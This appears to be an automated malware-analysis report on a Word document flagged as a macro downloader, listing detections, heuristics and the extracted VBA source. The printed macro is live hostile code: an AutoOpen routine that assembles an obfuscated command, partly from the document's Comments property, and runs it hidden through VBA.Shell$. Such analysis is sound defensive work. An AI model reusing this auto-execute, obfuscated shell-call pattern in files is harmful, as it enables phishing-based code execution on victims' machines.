MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic auto-exec macros, specifically an 'autoopen' marker, and is flagged for potential shell calls within its VBA code. ClamAV identifies it as 'Doc.Macro.DollarShell-6346616-0', indicating a known macro-based threat. The VBA script, though obfuscated, likely attempts to download and execute a second-stage payload, aligning with common phishing attachment tactics.
Heuristics 7
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
FsMfdeePsz = "frabbBen" + "DHPkFerh" + "ZNMYEWx" + "acEnbgsFfK" + "wdvzRarzwgC" + "UpKBMNnUBY" + YgeMyYHcgZG = "aBCEvkuAv" + "XtmmTvchW" + "nrekgXr" + "bxtryDznXYX" + "RemLEaA" + "ELRzctS" + ZuHtPXfTxb = "vGsNURs" + "bzMGwYwS" + "xebgfKdxZt" + "BvfbhFgbAwD" + "yUfsmgmkkbV" + "LZenkErK" + VFNpZccSK = "axfdePUp" + "saUTzVXg" + "WuGxPzzA" + "ybMMrZx" + "ZuCApZyGDL" + "seZXfMR" + dhzSNgaH = "ZrMbxkUVuS" + "AVHtGMv" + "tYfCMhNBwKS" + "ZurnhyvnfZg" + "UeZFWEgCUrd" + "TvUMcvG" + "csaPNbufxF" VBA.Shell$ "" + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + nKNcxZa + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + LDhsWVdnt, 0 gXcNPCEgawe = "NLHhpncnTrG" + "STLevWy" + "NARfANuMY" + "hGHRFDBTHRu" + "ffZmSCtZfTd" + "pUydWUWzu" + xKdEYSTxZU = "STBZHgm" + "tXAABwkXe" + "ruuSzraSStn" + "PSxfsEhXTX" + "YLNrLGZ" + "kKXkBTuRddN" + htYnmBfr = "HMmhnBWYP" + "kufprvAP" + "ktZuMgLLhLk" + "yaLRdfREr" + "PYtXfrUm" + "XKBFUwprTaW" + "HnKPtZYwyu" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "Module1" Sub autoopen() YDbpVTtPp -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5632 bytes |
SHA-256: a7560b90135ed0bf19fd10755ebe2033965f2230bb0301abd73f9c79bf36d032 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
317 of 383 identifiers look randomly generated (e.g. 'ZurnhyvnfZg') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
YDbpVTtPp
End Sub
Function YDbpVTtPp()
NZuKkfss = "FDLHxAyZS" + "xNmBHfMfb" + "LvLCHMe" + "tSXFSkss" + "AvvRRhAZ" + "VUFsaPgt" + erbNhtWRk = "yAUNbXApm" + "TumsWYB" + "zxkwvuZU" + "UwHXVYWA" + "ThUxyauAMkt" + "tYLNUcH" + AypwFdvp = "ycuWSYMA" + "nAkgxZS" + "PuYCHpEp" + "gLrTBUZ" + "NdtfZcPWCD" + "xyxVmFUzLGs" + GeTYbWd = "yRapeEgSCds" + "NaaANbe" + "VGKbggv" + "cKYrWsKpGd" + "zABLrTUy" + "CwcEnkU" + aKrRtkvZ = "BtzYScpW" + "fLEpsas" + "ZVtKMgVbs" + "sUuybceCcs" + "UcKeKdxR" + "czEMffcrUM" + "CUkgeYcT"
nYNKpNtHtMA = "LXcxmRte" + "tCGKpxa" + "aGNsDMttCAx" + "GnvnHgZ" + "XkCMgwx" + "gVEGkKmG" + CXVytvNds = "gnutCbn" + "aYCzfhaP" + "ETXYwfNRvu" + "zaeNvXst" + "kANUaRVxT" + "BfLPydz" + "kxMaTuLkw"
ZhrFUuLn = "CyCLWLcBgyz" + "PexzANhtBaF" + "ZUrxuhMTR" + "BtVAFudrew" + "ADUkxUKB" + "GdvdcdbyE" + tVZnDZUEnfD = "FWCYyfmm" + "RGDZMvZkGW" + "xAnKNNT" + "pFkcwLyuhBB" + "CvAdcwY" + "HGNKCandLFK" + FYMdmEy = "kemDdFrunCf" + "gfbDGYz" + "rKGbsLKny" + "kTZpgPcELX" + "TRASKNKH" + "kRWAVdRStKe" + xZKnLACNgen = "ZYUTNDnT" + "LpkftVN" + "ybzpThZc" + "YnYEHMvwBaG" + "KaHeKyWV" + "pSPWVdVZhG" + UzrFTZmu = "sUERNmXbBET" + "BhTxWwu" + "VavstzN" + "CshwcRzv" + "yNxhwsxfVhX" + "sdFBdzw" + "fxMetcLhcE"
rftXDAXXbbn = "FbVPpUHFK" + "LKFaLDNEKYR" + "zmeBAMEdGFA" + "VAvPSMdAkEy" + "MnXyPWb" + "SwUPyTX" + WgCVxfLxcz = "neSKcPfzar" + "YnPazkw" + "LnCrdvTTHM" + "wBgAWUNL" + "ZhPMsNm" + "BeTHFuBA" + kfWvGgU = "vaAGFcThbMu" + "fstWrypv" + "UzusRTGNZA" + "uhmFGZnMKk" + "yfVPsraYth" + "dLpLYgXgS" + LfCUZLfK = "dxNsypHSBsH" + "XaVcYts" + "XZSVWCg" + "UndtmrKyFTa" + "caTLVCMX" + "smpYNzv" + yRKmSKMWB = "HLWFTNtbBV" + "pktbEcVR" + "CBUMvmSy" + "ceXspUBrX" + "cXFNxSdY" + "DWWvDwdNdvN" + "TXaubdbda"
TKEbuZWBh = "ccUBCHLBxTg" + "hcNRyHeK" + "RKeXCYXh" + "hzudtedWFXy" + "UAWDmfmE" + "eHUVyMugf" + TTnhZWZKN = "NCywbXfAX" + "dVpsunYz" + "FLkazCgafn" + "CRDsPZzHBzH" + "MBTszceEVf" + "cXauVKCcrfS" + NwmKRzFgCHd = "mWETPkHhp" + "PYbABPzBUgh" + "wfMxUmP" + "yxwARwUFYFS" + "vZmukfwND" + "DUSXfdEvZMc" + "bfERshZepS"
nKNcxZa = "pO" + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + ActiveDocument.BuiltInDocumentProperties("Co" + "mm" + "ents") + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + ZsEXCYNaZNE
RaGWXpkMnk = "aBrfyRadUx" + "KnnXpbUgEB" + "rEDVBURHSzP" + "DatgwybaUZw" + "FDBPuMRSXYe" + "gABfVESGzFV" + MaEcDtL = "adDxxWb" + "HpNdfWSNMHd" + "TYgTLfn" + "UHnPSEVvZrh" + "uShtTRvW" + "CBgLzxfcsM" + ueEyVNyX = "DsEHkYhL" + "YaHXrCYM" + "zpAYLfDr" + "nfAGztyr" + "KuMWzhTdmTS" + "yuNbHfMkv" + LDhGDanhGL = "VauGsdK" + "bSTSmVfhx" + "ZtTefEhA" + "hfLaHvkUZdu" + "SxeKWsw" + "xmpCwLh" + xFXtxGh = "rnLsFHuZg" + "gWDDSvSvW" + "tkaWcKZMCB" + "TVRpvcba" + "mgTuhFnSGT" + "rnnrTyBwPX" + "UGkeVBGBsn"
saUzHxeu = "YHEcRNg" + "dyAdFanXwe" + "FavnLUg" + "yusSfTS" + "FvKWnDYggR" + "WgSNDKNRH" + NRXsynbc = "kTRkDKKu" + "UygKdakZh" + "khLPTXACmU" + "crmKnPAHXsb" + "kcRTMPU" + "XdUCTpa" + swweMSWw = "HhraZhduB" + "LXCunhvK" + "GMDHFsYU" + "RtrfSKwD" + "MsgGfLxDS" + "TZVMtgXAvND" + "WVNwCtTN"
VvMVPwmV = "sAgKrVLr" + "PkmFUpn" + "ZKcVskw" + "SLKauCckN" + "frcPEGy" + "dxGSvLunw" + dPaGkaZ = "fNmYecbRYEC" + "DTXFuRUWt" + "mfzhSYT" + "caVGWaP" + "MzprwzMrgp" + "BpceXBxa" + eAFhKDg = "axLaLdzx" + "KnEMPWLTcX" + "vspGhhsmF" + "wdXCvcnw" + "ynFuFPeF" + "tKPVZmHRf" + "tGdYgmNspN"
FsMfdeePsz = "frabbBen" + "DHPkFerh" + "ZNMYEWx" + "acEnbgsFfK" + "wdvzRarzwgC" + "UpKBMNnUBY" + YgeMyYHcgZG = "aBCEvkuAv" + "XtmmTvchW" + "nrekgXr" + "bxtryDznXYX" + "RemLEaA" + "ELRzctS" + ZuHtPXfTxb = "vGsNURs" + "bzMGwYwS" + "xebgfKdxZt" + "BvfbhFgbAwD" + "yUfsmgmkkbV" + "LZenkErK" + VFNpZccSK = "axfdePUp" + "saUTzVXg" + "WuGxPzzA" + "ybMMrZx" + "ZuCApZyGDL" + "seZXfMR" + dhzSNgaH = "ZrMbxkUVuS" + "AVHtGMv" + "tYfCMhNBwKS" + "ZurnhyvnfZg" + "UeZFWEgCUrd" + "TvUMcvG" + "csaPNbufxF"
VBA.Shell$ "" + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + nKNcxZa + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + LDhsWVdnt, 0
gXcNPCEgawe = "NLHhpncnTrG" + "STLevWy" + "NARfANuMY" + "hGHRFDBTHRu" + "ffZmSCtZfTd" + "pUydWUWzu" + xKdEYSTxZU = "STBZHgm" + "tXAABwkXe" + "ruuSzraSStn" + "PSxfsEhXTX" + "YLNrLGZ" + "kKXkBTuRddN" + htYnmBfr = "HMmhnBWYP" + "kufprvAP" + "ktZuMgLLhLk" + "yaLRdfREr" + "PYtXfrUm" + "XKBFUwprTaW" + "HnKPtZYwyu"
nEDVBaN = "SyWzrumMN" + "GpgrahxG" + "wgXDzPfP" + "NutuPXk" + "SyUyxMxcNKS" + "BmLAsZfKR" + fGsLKbBXk = "WKzMHgNeG" + "YAghycMz" + "gLWCtyM" + "xCfrGfh" + "HfDFsBF" + "MEZLEnMkec" + DtmUFZBY = "WrwtrpTk" + "VbBzSxaFvKp" + "GUmYuSK" + "wfaKPGGb" + "fCEAArrpzcU" + "tbkzrVKR" + "yUhbYDGLEty"
YHmAvkFAL = "xKhcywADU" + "fZANmVZdF" + "hvhvLksXm" + "TeVZhrEcXcb" + "bXcvNvBDXdm" + "XWaYdzpuwr" + GEDgzVEk = "TaXpnyV" + "EYNfYnH" + "dESmVEwvDd" + "PsnkMgk" + "rAAhsasY" + "tBvENxRpFD" + FVkBePC = "URTzByTcpdF" + "VGZaHsM" + "tYzrNXzdMD" + "yZmfcENd" + "kzvPMZwswK" + "bMMGmXcUt" + "YcUZYKfXA"
fBhpggHRWza = "WzsMKyDedct" + "CxTELaYDMMS" + "wALfFruE" + "KtcMRekvN" + "CBCyVSATrtS" + "aZAkTGUX" + FYeWekfbz = "BhzRzEE" + "nYtCVzXEZ" + "VTxuPyg" + "MTkyaaw" + "uYrupFe" + "vTZtVva" + CmRXDyyWHZf = "wDVEbBeZpU" + "vbPhvusXUyx" + "YDCsmDC" + "RAPgedZ" + "DdPMCaMXSv" + "VCTDhtnLKf" + sdFtZBvHe = "yAeawywRm" + "XSzxFxdAmFR" + "CReCBBGSZMf" + "cfdhbFU" + "BayumMA" + "XuNtnHGUAZ" + "pbbCBhzEm"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.